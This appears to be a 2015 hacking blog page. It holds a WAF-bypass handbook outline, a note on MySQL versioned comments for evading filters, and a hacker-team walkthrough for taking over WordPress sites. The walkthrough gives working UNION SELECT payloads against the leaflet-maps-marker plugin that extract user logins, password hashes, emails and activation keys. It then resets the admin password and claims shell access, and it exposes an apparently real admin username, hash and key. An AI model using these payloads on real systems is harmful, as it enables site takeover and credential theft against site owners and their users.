Wednesday, May 6, 2015

[New Book] SQL Injection Bypassing HandBook [details+Free]

Waf Bypass Hand Book



Content writers :-

Chapter I:::

  • SQL Injection: What is it?
  • SQL Injection: An In-depth Explanation
  • Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?
  • Is my database at risk to SQL Injection?
  • What is the impact of SQL Injection?
  • Example of a SQLInjection Attack

WebApplication Firewalls::

  • Detecting A WAF
  • Prompt Message
  • Dotdefender
  • Observing HTTP Response

Chapter II

Advanced evasion techniques for defeating SQL injection Input validation mechanisms
Web applications are becoming more and more technically complex. Web applications, their

  • Whitespace
  • Null Bytes
  • SQL Comments
  • URL Encoding
  • Changing Cases
  • Encode to Hex Forbidden
  • Replacing keywords technique
  • WAF Bypassing – using characters
  • HTTP Parameter Pollution (HPP)
  • CRLF WAF Bypass technique
  • Buffer Overflow bypassing

Chapter III

Let's see the matter in an orderly fashion from the beginning

  • See If Site vulnerability Or Not
  • Get Column Number
  • Bypassing union select
  • Get Version
  • Group & Concat
  • Bypass with Information_schema.tables
  • Requested Baypassing

Chapter IIII

Other issues related to the subject
  • Null Parameter
  • FIND VULNERABLE COLUMNS
  • Count(*)
  • unhex()
  • Get database



  • Source ::: HF

[Quick Guide] C-Style comments(WAF Bypassing queries explenation)

WAf Queries explanation
















Many peoples use cheat-sheets to bypass the Web Application Firewall (WAF) and they don't know why they write /*!union*/ and not a clean union.

So here is a quick explanation: 
This "things"(/*!12345query*/) called C-style comments these allows you to execute MySQL queries in comments.




Some examples && explanations :
PHP Code:

/*!12345union*/ bla bla bla injected query... 

When we execute that, the MySQL server parses our query and it will execute only if the MySQL version is up to 1.23.45 (12345 That's the number we wrote but without the points\dots)

Let's try again to make you understand better :

PHP Code:
/*!50000union*/ bla bla bla injected query... 

It will execute only if the version is up to 5.00.00 (Again, this is the number we wrote if you notice that..50000) in most cases, the query will execute, because most of the MySQL versions is bigger then 5.00.00...it's like 5.20.35 etc.
So what is that ? Confused
PHP Code:
/*!union*/ 
That's says "if the version is up to 0, execute the query."

Let's see what you learned.
Quick quiz :
John tries to bypass the WAF, he tried :


PHP Code:

/*!65432union*/ 

403 error was not appeared, but there was MySQL error...why ?
-----------------------------------------------------------------------------------------------------------------??

TongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongueTongue
Because our version is not up to 6.54.32 Oui
In fact, there is no MySQL version 6.54.32 dumbass Tongue
So far, the highest is 5.6(56000 \ 5.60.00)

References
http://dev.mysql.com/doc/refman/5.1/en/comments.html


Source :: HF

A new way to inject site that use Wordpress Script

This thread come to you by ☆¸.•*☆ :: Gaza Hacker Team [ GHT ] and [ GHI ] :: ☆*•.¸☆

Today I'll show you How to inject site - word press - And enter to admin panel in Seconds .

lets say we have this vuln site :




PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 
and let's say We extracted column number and admin data [ user and passwors ] by sqli 


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_userswhere (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --  

admin logo : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0

now this password is difficult to crack it

ok now i will show you Easy way to login into the admin panel

first we going to admin panel and press / Lost your password? \



PHP Code:

www.site.com/wp-login.php 

Wordpress exploit
























now we will put the admin user we found by injectin : michelsenweb .


Wordpress exploit






















like this

Wordpress exploit























now we haven't the admin mail to receive a link to create a new password 
or to get the activation key .

OK see what i will do !!!

now we will extracted user_activation_key by injection that we will use to grate new password


PHP Code:

www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users










now we have the user_activation_key to this admin user : michelsenweb

michelsenweb:ADpMtuhLWYbPSubvKwgx

now we will use this Query to grate new password

PHP Code:

www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login 

replace : user_activation_key by ADpMtuhLWYbPSubvKwgxreplace : user_login by michelsenweb .

like this

PHP Code:
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb 

wordpress exploit























now we get this page to grate now password after we Makes 
now password press Reset password

wordpress exploit















ok let's try to log into admin panel by our new password

wordpress expoilt























aha we now in admin panel and now we can spawned shell

wordpress exploit






















hope you learned something:::

Author :: 
Gaza Hacker Team

Tuesday, May 5, 2015

Beginners Guide to Building Mobile Web Apps Infinite Skills

Bulid mobile apps pic




In this Beginners Guide to Building Mobile Web Apps, expert authors Chris 
Minnick and Eva Holland will teach you how to create mobile web apps that will
be able to run on multiple mobile device operating systems. This course is
designed for the absolute beginner, meaning no web development experience is 
required.

You will start by learning about the three types of mobile apps, then jump into 
learning how to design an app.